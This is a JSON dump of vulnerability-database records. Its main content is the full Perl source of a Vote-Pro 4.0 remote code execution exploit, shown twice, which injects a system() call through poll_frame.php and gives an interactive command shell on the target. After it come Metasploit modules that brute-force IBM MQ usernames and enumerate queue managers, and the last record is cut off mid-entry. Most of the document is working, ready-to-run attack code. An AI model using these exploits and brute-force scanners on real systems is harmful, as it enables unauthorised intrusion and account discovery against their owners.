{"hash": "f8cb3d626967900a830455fe3d25a7baf39bd8f3df4080aa502aa7d17b2e96cb", "id": "1337DAY-ID-1414", "lastseen": "2018-03-14T06:37:04", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "3e47d4744c4aa2bafd998b5edcb45cc8", "key": "href"}, {"hash": "cbbdbdc5a720a957a3ec919dc7f81aa7", "key": "modified"}, {"hash": "cbbdbdc5a720a957a3ec919dc7f81aa7", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "147cd86e6e4609fbd31de3d9a2664576", "key": "reporter"}, {"hash": "9282376c728c869c719e6352b7005ac1", "key": "sourceData"}, {"hash": "c397f9a5d45693db6a353af6ce469d83", "key": "sourceHref"}, {"hash": "090a1f15ad6240de8ef9e5744ed4da03", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-29406", "1337DAY-ID-20958", "1337DAY-ID-5060", "1337DAY-ID-5020"]}, {"type": "nessus", "idList": ["FORTIOS_FGA-2013-22.NASL"]}, {"type": "cve", "idList": ["CVE-2013-1414"]}, {"type": "exploitdb", "idList": ["EDB-ID:26528"]}], "modified": "2018-03-14T06:37:04"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/1414", "description": "Exploit for unknown platform in category web applications", "title": "Vote-Pro 4.0 (poll_frame.php poll_id) Remote Code Execution Exploit", "history": [{"bulletin": {"hash": "f85ba9328f18be413eed5b9f83222598a9256362fb2348cf1da319a258d58624", "id": "1337DAY-ID-1414", "lastseen": "2016-04-19T03:51:19", "enchantments": {"score": {"value": 2.6, "modified": "2016-04-19T03:51:19"}}, "hashmap": [{"hash": "147cd86e6e4609fbd31de3d9a2664576", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "de53bcc78ab92d1a2128169f78870f8a", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "090a1f15ad6240de8ef9e5744ed4da03", "key": "title"}, {"hash": "345b140b123303a6241df4bebab3045d", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cbbdbdc5a720a957a3ec919dc7f81aa7", "key": "published"}, {"hash": "810b4bb4d1eac3639ad47768a84de4a8", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "cbbdbdc5a720a957a3ec919dc7f81aa7", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/1414", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "Vote-Pro 4.0 (poll_frame.php poll_id) Remote Code Execution Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===================================================================\r\nVote-Pro 4.0 (poll_frame.php poll_id) Remote Code Execution Exploit\r\n===================================================================\r\n\r\n\r\n\r\n#################################################################################################\r\n# r0ut3r Presents... #\r\n# #\r\n# Another r0ut3r discovery! # \r\n# Vote-Pro Code Injection 0day Exploit #\r\n#################################################################################################\r\n# Software: Vote-Pro 4.0 #\r\n# #\r\n# Vendor: http://www.vote-pro.com/ #\r\n# #\r\n# Released: 2007/01/23 #\r\n# #\r\n# Discovered & Exploit By: r0ut3r #\r\n# #\r\n# Note: The information provided in this document is for Vote-Pro administrator #\r\n# testing purposes only! #\r\n#################################################################################################\r\n\r\nuse IO::Socket;\r\n\r\n$port = \"80\"; # connection port\r\n$target = shift; # vote-pro.com\r\n$folder = shift; # /votepro/\r\n\r\nsub Header()\r\n{\r\n\tprint q\r\n\t{Vote-Pro Code Injection Exploit - writ3r \r\n-------------------------------------------------------\r\n};\r\n}\r\n\r\nsub Usage()\r\n{\r\n\tprint q\r\n\t{\r\nUsage: votecmd.pl [target] [directory]\r\nExample: votecmd.pl vote-pro.com /votepro/\r\n};\r\n\texit();\r\n}\r\n\r\nHeader();\r\n\r\nif (!$target || !$folder) {\r\n\tUsage(); }\r\n\r\nprint \"[+] Connecting...\\n\";\r\n$cmd = \"dir\";\r\nwhile ($cmd !~ \"exit\")\r\n{\r\n\t$xpack = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => $target, PeerPort => $port) || die \"[-] Failed to connect on exploit attempt. Exiting...\\r\\n\";\r\n\tprint $xpack \"GET \".$folder.\"poll_frame.php?poll_id=hyphy;system($_GET[com]);&com=\".substr($cmd, 0, -1).\"; HTTP/1.1\\n\";\r\n\tprint $xpack \"Host: $target\\n\";\r\n\tprint $xpack \"User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\\n\";\r\n\tprint $xpack \"Accept: text/html\\n\";\r\n\tprint $xpack \"Connection: keep-alive\\n\\n\";\r\n\r\n\tprint \"[cmd]\\$ \";\r\n\t$cmd = <STDIN>;\r\n\t$cmd =~ s/ /%20/g;\r\n}\r\n\r\nprint \"[!] Connection to host lost...\\n\";\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2007-01-23T00:00:00", "references": [], "reporter": "r0ut3r", "modified": "2007-01-23T00:00:00", "href": "http://0day.today/exploit/description/1414"}, "lastseen": "2016-04-19T03:51:19", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===================================================================\r\nVote-Pro 4.0 (poll_frame.php poll_id) Remote Code Execution Exploit\r\n===================================================================\r\n\r\n\r\n\r\n#################################################################################################\r\n# r0ut3r Presents... #\r\n# #\r\n# Another r0ut3r discovery! # \r\n# Vote-Pro Code Injection 0day Exploit #\r\n#################################################################################################\r\n# Software: Vote-Pro 4.0 #\r\n# #\r\n# Vendor: http://www.vote-pro.com/ #\r\n# #\r\n# Released: 2007/01/23 #\r\n# #\r\n# Discovered & Exploit By: r0ut3r #\r\n# #\r\n# Note: The information provided in this document is for Vote-Pro administrator #\r\n# testing purposes only! #\r\n#################################################################################################\r\n\r\nuse IO::Socket;\r\n\r\n$port = \"80\"; # connection port\r\n$target = shift; # vote-pro.com\r\n$folder = shift; # /votepro/\r\n\r\nsub Header()\r\n{\r\n\tprint q\r\n\t{Vote-Pro Code Injection Exploit - writ3r \r\n-------------------------------------------------------\r\n};\r\n}\r\n\r\nsub Usage()\r\n{\r\n\tprint q\r\n\t{\r\nUsage: votecmd.pl [target] [directory]\r\nExample: votecmd.pl vote-pro.com /votepro/\r\n};\r\n\texit();\r\n}\r\n\r\nHeader();\r\n\r\nif (!$target || !$folder) {\r\n\tUsage(); }\r\n\r\nprint \"[+] Connecting...\\n\";\r\n$cmd = \"dir\";\r\nwhile ($cmd !~ \"exit\")\r\n{\r\n\t$xpack = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => $target, PeerPort => $port) || die \"[-] Failed to connect on exploit attempt. Exiting...\\r\\n\";\r\n\tprint $xpack \"GET \".$folder.\"poll_frame.php?poll_id=hyphy;system($_GET[com]);&com=\".substr($cmd, 0, -1).\"; HTTP/1.1\\n\";\r\n\tprint $xpack \"Host: $target\\n\";\r\n\tprint $xpack \"User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\\n\";\r\n\tprint $xpack \"Accept: text/html\\n\";\r\n\tprint $xpack \"Connection: keep-alive\\n\\n\";\r\n\r\n\tprint \"[cmd]\\$ \";\r\n\t$cmd = <STDIN>;\r\n\t$cmd =~ s/ /%20/g;\r\n}\r\n\r\nprint \"[!] Connection to host lost...\\n\";\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "published": "2007-01-23T00:00:00", "references": [], "reporter": "r0ut3r", "modified": "2007-01-23T00:00:00", "href": "https://0day.today/exploit/description/1414"}

{"metasploit": [{"lastseen": "2019-01-01T09:59:26", "bulletinFamily": "exploit", "description": "This module can be used to bruteforce usernames that can be used to connect to a queue manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.", "modified": "2018-11-29T23:29:05", "published": "2018-10-28T19:29:45", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_LOGIN", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Login Check", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Login Check',\n 'Description' => 'This module can be used to bruteforce usernames that can be used to connect to a queue manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 5]),\n OptInt.new('CONCURRENCY', [true, \"The number of usernames to check concurrently\", 10]),\n OptString.new('QUEUE_MANAGER', [true, \"Queue Manager name to use\" ,\"\"]),\n OptString.new('CHANNEL', [true, \"Channel to use\" ,\"SYSTEM.ADMIN.SVRCONN\"]),\n OptString.new('PASSWORD', [false, \"Optional password to attempt with login\"]),\n OptPath.new('USERNAMES_FILE',\n [ true, \"The file that contains a list of usernames. UserIDs are case insensitive!\"]\n )])\n #deregister_options('THREADS')\n end\n\n def run_host(ip)\n @usernames = []\n if datastore['CHANNEL'].length.to_i > 20\n print_error(\"Channel name cannot be more that 20 characters.\")\n exit\n end\n if datastore['QUEUE_MANAGER'].length.to_i > 48\n print_error(\"Queue Manager name cannot be more that 48 characters.\")\n exit\n end\n begin\n username_list\n rescue ::Rex::ConnectionError\n rescue ::Exception => e\n print_error(\"#{e} #{e.backtrace}\")\n end\n print_line\n if(@usernames.empty?)\n print_status(\"#{ip}:#{rport} No valid users found.\")\n else\n print_good(\"#{ip}:#{rport} Valid usernames found: #{@usernames}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.usernames'\n )\n print_line\n end\n end\n\n def first_packet(channel,qm_name)\n init1 = \"\\x54\\x53\\x48\\x20\" + \t# StructId\n \"\\x00\\x00\\x01\\x0c\" + \t\t# MQSegmLen\n \"\\x01\" + \t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t# SegmType\n \"\\x31\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x00\\x00\\x01\\x11\" + \t\t# Encoding\n \"\\x04\\xb8\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t# StructId\n \"\\x0d\" + \t\t\t\t# FAPLevel\n \"\\x26\" + \t\t\t\t# CapFlag1\n \"\\x00\" + \t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t# InierrFlg1\n \"\\x00\\x00\" + \t\t\t# ReserveD\n \"\\x00\\x00\" + \t\t\t# MaxMsgBtch\n \"\\x00\\x00\\x7f\\xec\" + \t\t# MaxTrSize\n \"\\x06\\x40\\x00\\x00\" + \t\t# MaxMsgSize\n \"\\x00\\x00\\x00\\x00\" + \t\t# SeqWrapVal\n channel + \t\t\t\t# Channel Name\n \"\\x51\" + \t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t# ECapFlag2\n \"\\x04\\xb8\" + \t\t\t# ccsid\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x00\\x00\\x00\\x01\" + \t\t# HBInterval\n \"\\x00\\x8a\" + \t\t\t# EFLLength\n \"\\x00\" +\t\t\t\t# IniErrFlg2\n \"\\x00\" + \t\t\t\t# Reserved1\n \"\\x00\\xff\" + \t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# MsgCprsLst2\n \"\\x00\\x00\" + \t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t# SSLKeyRst\n \"\\x00\\x00\\x00\\x0a\" + \t\t# ConvBySkt\n \"\\x08\" + \t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" + \t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" + \t\t# ThreadId\n \"\\x00\\x00\\x00\\x1b\" + \t\t# TraceId\n \"MQMM09000000\" + \t\t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 + \t\t# MQM ID\n \"\\x00\\x01\\x00\\x00\\xff\\xff\\xff\\xff\" +# Unknown1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# Unknown2\n \"\\xff\\xff\\xff\\xff\\xf1\\x18\\xa6\\x93\" +# Unknown3\n \"\\x2b\\x8a\\x44\\x3c\\x67\\x53\\x73\\x08\"\t# Unknown4\n end\n\n def second_packet(channel,qm_name)\n init2 = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x00\\xf4\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers Id\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request Id\n \"\\x02\" + \t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t# SegmType\n \"\\x31\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t# StructId\n \"\\x0c\" + \t\t\t\t# FAPLevel\n \"\\x26\" + \t\t\t\t# CapFlag1\n \"\\x00\" + \t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x00\\x00\" + \t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" + \t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" + \t\t# MaxMsgSize\n \"\\x00\\x00\\x00\\x00\" + \t\t# SeqWrapVal\n channel + \t\t\t\t# Channel Name\n \"\\x51\" + \t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t# ECapFlag2\n \"\\xb5\\x01\" + \t\t\t# ccsid\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x2c\\x01\\x00\\x00\" + \t\t# HBInterval\n \"\\x8a\\x00\" + \t\t\t# EFLLength\n \"\\x00\" + \t\t\t\t# IniErrFlg2\n \"\\x00\" + \t\t\t\t# Reserved1\n \"\\x00\\xff\" + \t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst2\n \"\\xff\\xff\" + \t\t\t# MsgCprsLst3\n \"\\x00\\x00\" + \t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t# SSLKeyRst\n \"\\x0a\\x00\\x00\\x00\" + \t\t# ConvBySkt\n \"\\x00\" + \t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" + \t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" + \t\t# ThreadId\n \"\\x1b\\x00\\x00\\x00\" + \t\t# TraceId\n \"MQMM09000000\" + \t\t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 \t\t# MQM ID\n end\n\n def send_userid(userid,uname)\n\n if datastore['PASSWORD'].nil?\n password = \"\\x00\" * 12\n else\n password = datastore['PASSWORD']\n if (password.length > 12)\n print_warning(\"Passwords greater than 12 characters are unsupported. Truncating...\")\n password = password[0..12]\n end\n password = password + ( \"\\x00\" * (12-password.length) )\n end\n vprint_status(\"Using password: '#{password}' (Length: #{password.length})\")\n\n send_userid = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x00\\xa8\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers ID\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request ID\n \"\\x02\" + \t\t\t\t# Byte Order\n \"\\x08\" + \t\t\t\t# SegmType\n \"\\x30\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x55\\x49\\x44\\x20\" + \t\t# StructId\n userid + \t\t\t\t# UserId - Doesnt affect anything\n password + # Password\n uname + \t\t\t\t# Long UID - This matters!\n \"\\x00\" + \t\t\t\t# SID Len\n \"\\x00\" * 39 \t\t\t# Unknown\n end\n\n def start_conn(qm_name)\n start_conn = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x01\\x38\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers ID\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request ID\n \"\\x02\" + \t\t\t\t# Byte Order\n \"\\x81\" + \t\t\t\t# SegmType\n \"\\x30\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x00\\x00\\x01\\x38\" + \t\t# Reply Len\n \"\\x00\\x00\\x00\\x00\" + \t\t# Compl Code\n \"\\x00\\x00\\x00\\x00\" + \t\t# Reason Code\n \"\\x00\\x00\\x00\\x00\" + \t\t# Object Hdl\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x4d\\x51\\x20\\x45\\x78\\x70\\x6c\" + \t# Appl Name\n \"\\x6f\\x72\\x65\\x72\\x20\\x39\\x2e\" + \t# Appl Name\n \"\\x30\\x2e\\x30\\x20\\x20\\x20\\x20\" + \t# Appl Name\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\" + \t# Appl Name\n \"\\x1c\\x00\\x00\\x00\" + \t\t# ApplType\n \"\\x00\" * 32 + \t\t\t# AccntTok\n \"\\x03\\x00\\x00\\x00\" + \t\t# MQCONNX\n \"\\x00\\x00\\x00\\x00\" + \t\t# Options\n \"\\x46\\x43\\x4e\\x4f\" + \t\t# Struct ID\n \"\\x02\\x00\\x00\\x00\" + \t\t# Version\n \"\\x00\\x00\\x00\\x00\" + \t\t# Option\n \"\\x4d\\x51\\x4a\\x42\\x30\\x39\\x30\" + \t# msgid\n \"\\x30\\x30\\x30\\x30\\x34\" + \t\t# msgid\n \"MQM\" + \"\\x20\" * 45 + \t\t# MqmId\n \"\\x00\" * 68\t\t\t\t# Unknown\n end\n\n def username_list\n username_data = get_usernames\n while (username_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_username = username_data.shift\n if this_username.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_username) do |username|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{username}...\"\n channel = datastore['CHANNEL']\n if channel.length > 20\n print_error(\"Channel name must be less than 20 characters.\")\n next\n end\n channel += \"\\x20\" * (20-channel.length.to_i) # max channel name length is 20\n qm_name = datastore['QUEUE_MANAGER']\n if qm_name.length > 48\n print_error(\"Queue Manager name must be less than 48 characters.\")\n next\n end\n qm_name += \"\\x20\" * (48-qm_name.length.to_i) # max queue manager name length is 48\n if username.length > 12\n print_error(\"Username must be less than 12 characters.\")\n next\n end\n uname = username + \"\\x20\" * (64-username.length.to_i)\n userid = username + \"\\x20\" * (12 - username.length.to_i) # this doesnt make a difference\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(first_packet(channel,qm_name))\n first_response = s.get_once(-1,timeout)\n if first_response[-4..-1] == \"\\x00\\x00\\x00\\x02\" # CHANNEL_WRONG_TYPE code\n print_error(\"Channel needs to be MQI type!\")\n next\n end\n s.put(second_packet(channel,qm_name))\n second_response = s.get_once(-1,timeout)\n s.put(send_userid(userid,uname))\n s.put(start_conn(qm_name))\n data = s.get_once(-1,timeout)\n if data[41..44] == \"\\x00\\x00\\x00\\x00\"\n print_status(\"Found username: #{username}\")\n @usernames << username\n end\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_usernames\n if(! @common)\n File.open(datastore['USERNAMES_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/misc/ibm_mq_login.rb"}, {"lastseen": "2019-03-29T11:11:42", "bulletinFamily": "exploit", "description": "Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. Any channel type can be used to get this information as long as the name of the channel is valid.", "modified": "2018-11-21T22:09:18", "published": "2018-10-28T16:09:17", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_ENUM", "href": "", "type": "metasploit", "title": "Identify Queue Manager Name and MQ Version", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Identify Queue Manager Name and MQ Version',\n 'Description' => 'Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. Any channel type can be used to get this information as long as the name of the channel is valid.',\n 'Author' => [ 'Petros Koutroumpis' ],\n 'License' => MSF_LICENSE\n ))\n register_options(\n [\n OptString.new('CHANNEL', [ true, \"Channel to use\" ,\"SYSTEM.DEF.SVRCONN\"]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent ports to check per host\", 10]),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptString.new('PORTS', [true, 'Ports to probe', '1414']),\n\n ])\n deregister_options('RPORT')\n end\n\n\n def create_packet(channel_type)\n chan = datastore['CHANNEL'] + \"\\x20\"*(20-datastore['CHANNEL'].length.to_i)\n if channel_type == 0\n chan_type = \"\\x26\"\n elsif channel_type == 1\n chan_type = \"\\x07\"\n elsif channel_type == 2\n chan_type = \"\\x08\"\n end\n\n packet = \"\\x54\\x53\\x48\\x20\" + \t\t# StructID\n \"\\x00\\x00\\x01\\x0c\" + \t\t\t# MQSegmLen\n \"\\x02\" + \t\t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t\t# SegmType\n \"\\x01\" + \t\t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\t# LUW Ident\n \"\\x22\\x02\\x00\\x00\" + \t\t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t\t# StructId\n \"\\x0d\" + \t\t\t\t\t# FAP level\n chan_type + \t\t\t\t# CapFlag1 - Message Type\n \"\\x00\" + \t\t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" + \t\t\t\t# Reserved\n \"\\x32\\x00\" + \t\t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" + \t\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" + \t\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" + \t\t\t# SeqWrapVal\n chan + \t\t\t\t\t# Channel Name\n \"\\x87\" + \t\t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t\t# ECapFlag2\n \"\\x5b\\x01\" +\t\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x2c\\x01\\x00\\x00\" + \t\t\t# HBInterval\n \"\\x8a\\x00\" + \t\t\t\t# EFLLength\n \"\\x00\" + \t\t\t\t\t# IniErrFlg2\n \"\\x55\" + \t\t\t\t\t# Reserved1\n \"\\x00\\xff\" +\t\t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t\t# MsgCprsLst2\n \"\\x00\\x00\" + \t\t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t\t# SSLKeyRst\n \"\\x00\\x00\\x00\\x00\" + \t\t\t# ConvBySkt\n \"\\x05\" + \t\t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t\t# Reserved3\n \"\\x10\\x13\\x00\\x00\" + \t\t\t# ProcessId\n \"\\x01\\x00\\x00\\x00\" + \t\t\t# ThreadId\n \"\\x01\\x00\\x00\\x00\" + \t\t\t# TraceId\n \"MQMM09000000\" +\t\t \t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 + \t\t\t# MQM ID\n \"\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +\t# Unknown1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# Unknown2\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + \t# Unknown3\n \"\\x00\\x00\\x00\\x00\\x00\" \t\t\t# Unknown4\n end\n\n\n def run_host(ip)\n chan = datastore['CHANNEL']\n if chan.length > 20\n print_error(\"Channel name must be less than 20 characters.\")\n raise Msf::OptionValidateError.new(['CHANNEL'])\n end\n ports = Rex::Socket.portspec_crack(datastore['PORTS'])\n while(ports.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_port = ports.shift\n break if not this_port\n t << framework.threads.spawn(\"Module(#{self.refname})-#{ip}:#{this_port}\", false, this_port) do |port|\n begin\n data_recv = \"\"\n 3.times do |channel_type|\n data_recv = send_packet(ip,port,channel_type)\n if data_recv.nil?\n next\n end\n # check if CHANNEL_WRONG_TYPE error received and retry with different type\n if data_recv[data_recv.length-4...data_recv.length] != \"\\x02\\x00\\x00\\x00\"\n break\n end\n end\n if data_recv.nil?\n print_status(\"No response received. Try increasing TIMEOUT value.\")\n print_line\n next\n end\n status_code = data_recv[-4..-1]\n if status_code == \"\\x18\\x00\\x00\\x00\"\n print_status(\"Channel Requires SSL. Could not get more information.\")\n print_line\n end\n if not data_recv[0...3].include?('TSH')\n next\n end\n if status_code == \"\\x01\\x00\\x00\\x00\"\n print_error('Channel \"' + chan + '\" does not exist.')\n print_line\n end\n if status_code == \"\\x02\\x00\\x00\\x00\" or status_code == \"\\x06\\x00\\x00\\x00\"\n print_error('Unsupported channel type. Try a different channel.')\n print_line\n end\n if data_recv.length < 180\n next\n end\n qm_name = data_recv[76...124].delete(' ')\n mq_version = data_recv[180...188].scan(/../).collect{|x| x.to_i}.join('.')\n print_good(\"#{ip}:#{port} - Queue Manager Name: #{qm_name} - MQ Version: #{mq_version}\")\n print_line\n end\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def send_packet(ip,port,channel_type)\n begin\n timeout = datastore['TIMEOUT'].to_i\n packet = create_packet(channel_type)\n s = connect(false,\n {\n 'RPORT' => port,\n 'RHOST' => ip,\n }\n )\n s.put(packet)\n data = s.get_once(-1,timeout)\n return data\n rescue ::Rex::ConnectionRefused\n print_error(\"#{ip}:#{port} - TCP Port Closed.\")\n print_line\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n print_error(\"#{ip}:#{port} - Connection Failed.\")\n print_line\n rescue ::Interrupt\n raise $!\n ensure\n if s\n disconnect(s) rescue nil\n end\n end\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/misc/ibm_mq_enum.rb"}, {"lastseen": "2019-04-10T18:04:59", "bulletinFamily": "exploit", "description": "This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.", "modified": "2018-11-20T22:24:17", "published": "2018-10-28T15:22:27", "id": 